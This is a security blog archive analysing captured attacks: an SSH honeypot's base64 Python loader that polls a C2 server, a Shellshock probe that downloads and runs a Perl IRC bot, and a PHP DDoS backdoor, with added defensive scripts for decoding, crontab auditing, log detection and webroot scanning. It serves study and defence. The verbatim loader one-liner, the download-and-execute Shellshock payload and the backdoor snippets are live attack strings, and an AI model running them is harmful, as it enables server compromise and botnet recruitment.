Archive for the ‘exploits’ Category

Linux Botnet

Wednesday, January 10th, 2018

Another nice SSH honeypot catch:

uname nohup python -c "import base64;exec(base64.b64decode('I2NvZGluZzogdXRmLTgKaW1wb3J0IHVybGxpYgppbXBvcnQgYmFzZTY0CndoaWxlIFRydWU6CiAgICB0cnk6CiAgICAgICAgcGFnZT1iYXNlNjQuYjY0ZGVjb2RlKHVybGxpYi51cmxvcGVuKCJodHRwOi8vay56c3c4LmNjL0FwaS8iKS5yZWFkKCkpCiAgICAgICAgZXhlYyhwYWdlKQogICAgZXhjZXB0OgogICAgICAgIHBhc3MKICAgIHRpbWUuc2xlZXAoMzAwKQ=='))" > /dev/null 2 >& 1 &

That decodes to a small loader which downloads a base64-encoded complete Python program from http://k.zsw8.cc/Api/ and runs it.
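An added example (not from the original post) of how to triage such a catch without running it: the script pulls the inline base64 literal out of the captured command line, decodes it, and reports the URLs it contacts, the beacon interval and the behaviours seen. The command line embedded below is the one quoted above, joined back onto a single line; the indicator names and the regexes are my own choices.

```python
import base64
import re

# The honeypot-captured command line from this post, joined onto one line.
CAPTURED_CMD = (
    'uname nohup python -c "import base64;exec(base64.b64decode(\''
    'I2NvZGluZzogdXRmLTgKaW1wb3J0IHVybGxpYgppbXBvcnQgYmFzZTY0CndoaWxlIFRydWU6CiAgICB0cnk6CiAgIC'
    'AgICAgcGFnZT1iYXNlNjQuYjY0ZGVjb2RlKHVybGxpYi51cmxvcGVuKCJodHRwOi8vay56c3c4LmNjL0FwaS8iKS5yZWFkKCkpCiAgICAgICAgZXhlYyhwYW'
    'dlKQogICAgZXhjZXB0OgogICAgICAgIHBhc3MKICAgIHRpbWUuc2xlZXAoMzAwKQ=='
    '\'))" > /dev/null 2 >& 1 &'
)

# An inline base64 literal handed to b64decode(): the loader pattern seen above.
B64_EXEC_RE = re.compile(r"b64decode\(\s*['\"]([A-Za-z0-9+/=]+)['\"]\s*\)")
URL_RE = re.compile(r"https?://[^\s'\"();|&<>]+")
# Behaviours worth flagging in a decoded stage (names and patterns are my own).
INDICATORS = {
    "fetches_remote_code": re.compile(r"urlopen\(|requests\.get\(|urlretrieve\("),
    "executes_downloaded_data": re.compile(r"\bexec\(|\beval\("),
    "polls_in_loop": re.compile(r"while\s+True\s*:"),
    "swallows_errors": re.compile(r"except\s*:\s*\n\s*pass"),
}


def extract_stages(cmdline):
    """Decode every inline base64 literal passed to b64decode(), including
    literals nested inside an already decoded stage. Nothing is executed."""
    stages, queue = [], [cmdline]
    while queue:
        text = queue.pop(0)
        for blob in B64_EXEC_RE.findall(text):
            try:
                decoded = base64.b64decode(blob, validate=True).decode("utf-8", "replace")
            except ValueError:  # binascii.Error is a ValueError: not real base64
                continue
            stages.append(decoded)
            queue.append(decoded)  # a stage may wrap yet another inline layer
    return stages


def analyse(cmdline):
    """Return the decoded stage(s), the URLs they contact, the beacon
    interval if a time.sleep(N) is present, and which behaviours matched."""
    stages = extract_stages(cmdline)
    report = {"stages": stages, "urls": [], "sleep_seconds": None, "indicators": []}
    for text in stages:
        for url in URL_RE.findall(text):
            if url not in report["urls"]:
                report["urls"].append(url)
        m = re.search(r"time\.sleep\((\d+)\)", text)
        if m:
            report["sleep_seconds"] = int(m.group(1))
        for name, rx in INDICATORS.items():
            if rx.search(text) and name not in report["indicators"]:
                report["indicators"].append(name)
    return report


if __name__ == "__main__":
    r = analyse(CAPTURED_CMD)
    print(r["stages"][0])
    print("contacts:", r["urls"], "- beacons every", r["sleep_seconds"], "s")
    print("indicators:", r["indicators"])
```

Run it over honeypot session logs or auditd execve records; the decoded stage is only inspected, never exec'd, so the analysis is safe on an analyst box. For this sample it yields the C2 URL, a 300-second polling interval and all four indicators.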

In that program a crontab entry is made:

if runCodePath not in crontabData:
    f = open("/etc/crontab", "a+")
    f.write("\n0 */6 * * * root %s\n" % runCodePath)
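An added example (my own code, not from the post or the malware) of the matching check on the defender's side: parse a system crontab and flag jobs whose program lives in a scratch directory or behind a hidden path component, which is where such appended entries usually point. The crontab text below is constructed; the suspicious path in it is made up for the sample.

```python
import re
import sys

# Constructed sample of an /etc/crontab: two stock Debian-style jobs plus one
# entry of the kind the loader above appends (root, every six hours, from /tmp).
SAMPLE_CRONTAB = """\
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )

0 */6 * * * root /tmp/.cache/update.py
"""

# Directories a legitimate system cron job has no business starting from.
SUSPICIOUS_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/", "/run/shm/")
# System crontab layout: five schedule fields, the user, then the command.
ENTRY_RE = re.compile(r"^\s*(\S+\s+\S+\s+\S+\s+\S+\s+\S+)\s+(\S+)\s+(.+?)\s*$")


def parse_system_crontab(text):
    """Yield (schedule, user, command) per job line; skip comments and VAR=value lines."""
    for line in text.splitlines():
        if not line.strip() or line.lstrip().startswith("#") or re.match(r"^\s*\w+=", line):
            continue
        m = ENTRY_RE.match(line)
        if m:
            yield m.group(1), m.group(2), m.group(3)


def suspicious_entries(text):
    """Return job lines whose program sits in a scratch dir or under a hidden path."""
    hits = []
    for schedule, user, command in parse_system_crontab(text):
        program = command.split()[0]  # the first token is what cron will start
        in_scratch = program.startswith(SUSPICIOUS_DIRS)
        hidden = any(part.startswith(".") for part in program.split("/") if part)
        reasons = [r for r, flag in (("scratch-dir", in_scratch), ("hidden-path", hidden)) if flag]
        if reasons:
            hits.append({"schedule": schedule, "user": user, "command": command, "reasons": reasons})
    return hits


if __name__ == "__main__":
    # Pass a crontab path (e.g. /etc/crontab) to audit a real file; defaults to the sample.
    source = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_CRONTAB
    for hit in suspicious_entries(source):
        print("%s  %s  %s   <- %s" % (hit["schedule"], hit["user"], hit["command"],
                                      ", ".join(hit["reasons"])))
```

The same parser can be pointed at the files under /etc/cron.d; per-user crontabs in /var/spool/cron have no user field, so the regex would need one group fewer there.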

then it uploads data about the compromised server to the herder:

my_data = {"key":d.get_key, "name":d.get_name, "os":d.get_platform, "core":d.get_core, "cpu":d.get_cpucount, "cpuuse":d.get_cpuuse, "status":d.get_status}
f = urllib.urlopen(apiURL, urllib.urlencode(my_data))

and waits for commands:

if data.has_key("download") and data["download"]:
    DownExec(data["download"], task_id)
if data.has_key("cmd") and data["cmd"]:
    CmdExec(data["cmd"], task_id)

I wonder what would happen if the computer name were a BeEF XSS hook or something..?

recently in the webserver log ..

Monday, August 17th, 2015

While strolling through the webserver logs, I found this little asshole..:

78.25.80.226 - - [16/Aug/2015:21:35:01 +0200] "GET /suspendedpage.cgi HTTP/1.1" 404 494 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://189.11.9.243/fix.pl;curl -O http://189.11.9.243/fix.pl;fetch http://189.11.9.243/fix.pl;lwp-download http://189.11.9.243/fix.pl;perl fix.pl;rm -rf fix.pl;rm -rf fix.pl*\""

fix.pl sets up an IRC connection and waits for commands such as
portscan, tcpflood or a reverse shell ..

Looks like there are still servers out there which are vulnerable to Shellshock ..
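An added example (not part of the post) of spotting such probes in an access log: it parses combined-format lines, looks for the `() {` function-definition prefix that Shellshock keys on in the header fields Apache records, and pulls out the download URLs in the payload. The sample log is constructed; its second line is the entry quoted above joined onto one line, the other two are benign filler.

```python
import re

# Constructed sample log: one benign GET, the probe from the post, one benign POST.
SAMPLE_LOG = r'''10.0.0.5 - - [16/Aug/2015:21:30:12 +0200] "GET /index.html HTTP/1.1" 200 5120 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/40.0"
78.25.80.226 - - [16/Aug/2015:21:35:01 +0200] "GET /suspendedpage.cgi HTTP/1.1" 404 494 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://189.11.9.243/fix.pl;curl -O http://189.11.9.243/fix.pl;fetch http://189.11.9.243/fix.pl;lwp-download http://189.11.9.243/fix.pl;perl fix.pl;rm -rf fix.pl;rm -rf fix.pl*\""
10.0.0.9 - - [16/Aug/2015:21:36:44 +0200] "POST /cgi-bin/contact.cgi HTTP/1.1" 200 310 "http://example.test/contact" "curl/7.43.0"
'''

# Apache "combined" format; referer and user-agent groups tolerate the \" that
# Apache writes for quotes embedded in a header value.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>(?:[^"\\]|\\.)*)" '
    r'"(?P<user_agent>(?:[^"\\]|\\.)*)"$'
)
# The exported-function prefix that makes a vulnerable bash parse the rest of the value.
SHELLSHOCK_RE = re.compile(r"\(\s*\)\s*\{")
# Stop at shell separators so "http://x/fix.pl;curl" does not swallow the next command.
URL_RE = re.compile(r"https?://[^\s'\"();|&<>]+")


def parse_line(line):
    """Split one combined-format line into its fields, or return None if it does not parse."""
    m = LOG_RE.match(line.rstrip("\n"))
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def find_shellshock(log_text):
    """Return one record per line carrying a Shellshock-style payload in a header field."""
    hits = []
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        # Any header Apache exports into the CGI environment can carry the payload;
        # the combined format only records these two, so check both.
        for field in ("user_agent", "referer"):
            if SHELLSHOCK_RE.search(rec[field]):
                urls = []
                for url in URL_RE.findall(rec[field]):
                    if url not in urls:
                        urls.append(url)
                hits.append({"ip": rec["ip"], "time": rec["time"], "request": rec["request"],
                             "status": rec["status"], "field": field, "urls": urls})
                break
    return hits


if __name__ == "__main__":
    for hit in find_shellshock(SAMPLE_LOG):
        print("%(time)s %(ip)s %(request)s -> %(status)s; payload in %(field)s; fetches %(urls)s" % hit)
```

The 404 in the sample only says the CGI path did not exist on this host; a probe sent to a path that does reach a bash-backed CGI handler logs a 200, so match on the header payload, not on the status code.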

DDoS PHP-Script

Tuesday, December 18th, 2012

Just recently the BSI warned about an ongoing attack on US banks.
The PHP script involved showed a “404” error when called without any
arguments.

A closer look shows a “404 Not Foun derror” WITH the typo in it.
Now we have a neat string to search for in Google or wherever..
and bingo: some other victim already posted the source code
from the infected webserver:


Here we can see that a POST action “stop” makes the DDoS go away..

function stoped()
{
    @unlink($base."stmdu.php");
    @unlink($base."stp.hp");
    cmdexec("killall ping;");
    print "Stop & Clean";
}

And here is where the typo sits:

if(md5(md5(md5($_REQUEST['pass'])))!=$pass_up and $_SESSION['LoGiN']!=true)
{
    print "404 Not Found

Not Found

The requested URL ".$_SERVER['PHP_SELF']." was not found on this server

Additionally, a 404 Not Foun derror was encountered while trying to use an Error Document to handle the request

";
    die();
    exit();
}
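An added example (my own, not from the post) that turns the "neat string to search for" idea into a webroot sweep: it fingerprints PHP files on the typo in the fake 404 page plus the other distinctive fragments of the quoted script (the triple md5 gate, the LoGiN session flag, the killall and unlink cleanup) and reports every file that matches at least one. The two sample files are constructed fragments shaped like the quoted code and like a harmless login check.

```python
import os
import re
import tempfile

# Fingerprints taken from the script quoted in the post (pattern names are my own).
FINGERPRINTS = {
    "typo_404_page": re.compile(r"404 Not Foun derror"),
    "triple_md5_gate": re.compile(r"md5\(\s*md5\(\s*md5\("),
    "session_login_flag": re.compile(r"\$_SESSION\[\s*['\"]LoGiN['\"]\s*\]"),
    "killall_ping": re.compile(r"killall\s+ping"),
    "dropped_file_cleanup": re.compile(r"@unlink\(\s*\$base\s*\."),
}


def fingerprint_source(text):
    """Return the names of all fingerprints present in one file's contents."""
    return [name for name, rx in FINGERPRINTS.items() if rx.search(text)]


def scan_webroot(root, extensions=(".php", ".phtml", ".inc")):
    """Walk a directory tree and list (path, matched fingerprints) for every hit."""
    findings = []
    for dirpath, _dirs, files in os.walk(root):
        for fname in files:
            if not fname.lower().endswith(extensions):
                continue
            path = os.path.join(dirpath, fname)
            try:
                with open(path, "r", encoding="utf-8", errors="replace") as fh:
                    matched = fingerprint_source(fh.read())
            except OSError:
                continue  # unreadable file: skip rather than abort the sweep
            if matched:
                findings.append((path, matched))
    return findings


# Constructed sample: a fragment shaped like the quoted backdoor, and a harmless one.
SUSPECT = '''<?php
if(md5(md5(md5($_REQUEST['pass'])))!=$pass_up and $_SESSION['LoGiN']!=true)
{ print "Additionally, a 404 Not Foun derror was encountered"; die(); }
function stoped(){ @unlink($base."stmdu.php"); cmdexec("killall ping;"); }
'''
BENIGN = '''<?php
if (!password_verify($_POST['pass'], $stored_hash)) { http_response_code(403); exit; }
'''


def demo_scan():
    """Write both samples into a temporary webroot, scan it, return relative paths and hits."""
    with tempfile.TemporaryDirectory() as tmp:
        os.makedirs(os.path.join(tmp, "uploads"))
        with open(os.path.join(tmp, "uploads", "stmdu.php"), "w") as fh:
            fh.write(SUSPECT)
        with open(os.path.join(tmp, "login.php"), "w") as fh:
            fh.write(BENIGN)
        return [(os.path.relpath(p, tmp), m) for p, m in scan_webroot(tmp)]


if __name__ == "__main__":
    for path, matched in demo_scan():
        print(path, "->", ", ".join(matched))
```

Point scan_webroot at the real document root to sweep a server; one fingerprint is enough to warrant a look, and the typo string alone is specific enough that a grep across a hosting estate turns up copies of this exact script.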